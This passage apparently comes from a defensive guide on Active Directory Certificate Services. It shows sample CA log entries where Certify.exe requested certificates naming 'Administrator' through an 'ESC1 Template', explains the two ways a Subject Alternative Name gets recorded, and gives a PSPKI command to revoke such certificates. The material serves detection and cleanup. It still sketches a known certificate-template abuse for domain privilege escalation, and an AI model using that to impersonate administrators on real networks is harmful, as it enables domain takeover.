Here is an example result entry that shows a situation where a Subject Alternative Name (SAN) was specified with Certify:

CA                       : dc.theshire.local\theshire-DC-CA
RequestID : 4602
RequesterName : THESHIRE\cody
RequesterMachineName : dev.theshire.local
RequesterProcessName : Certify.exe
SubjectAltNamesExtension :
SubjectAltNamesAttrib : Administrator
SerialNumber : 55000011faef0fab5ffd7f75b30000000011fa
CertificateTemplate : ESC1 Template
(1.3.6.1.4.1.311.21.8.10395027.10224472.4213181.15714845.1171465.9.10657968.9897558)
RequestDate : 6/3/2021 5:54:51 PM
StartDate : 6/3/2021 5:44:51 PM
EndDate : 6/3/2022 5:44:51 PM

CA : dc.theshire.local\theshire-DC-CA
RequestID : 4603
RequesterName : THESHIRE\cody
RequesterMachineName : dev.theshire.local
RequesterProcessName : Certify.exe
SubjectAltNamesExtension : Administrator
SubjectAltNamesAttrib :
SerialNumber : 55000011fb021b79cf7276c2de0000000011fb
CertificateTemplate : ESC1 Template
(1.3.6.1.4.1.311.21.8.10395027.10224472.4213181.15714845.1171465.9.10657968.9897558)
RequestDate : 6/3/2021 5:55:10 PM
StartDate : 6/3/2021 5:45:10 PM
EndDate : 6/3/2022 5:45:10 PM

The SubjectAltNamesExtension property means that the x509 SubjectAlternativeNames extension was used to specify the SAN, which happens for templates with the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag. The SubjectAltNamesAttrib property means that x509 name/value pairs were used, which happens when specifying a SAN when the EDITF_ATTRIBUTESUBJECTALTNAME2 CA flag is set.

Existing issued certificates can be revoked using PSPKI's Revoke-Certificate function:

PS C:\> Get-CertificationAuthority <CAName> | Get-IssuedRequest -RequestID <X> | Revoke-Certificate -Reason "KeyCompromise"

Applicable values for -Reason are "KeyCompromise", "CACompromise", and "Unspecified".



โŒ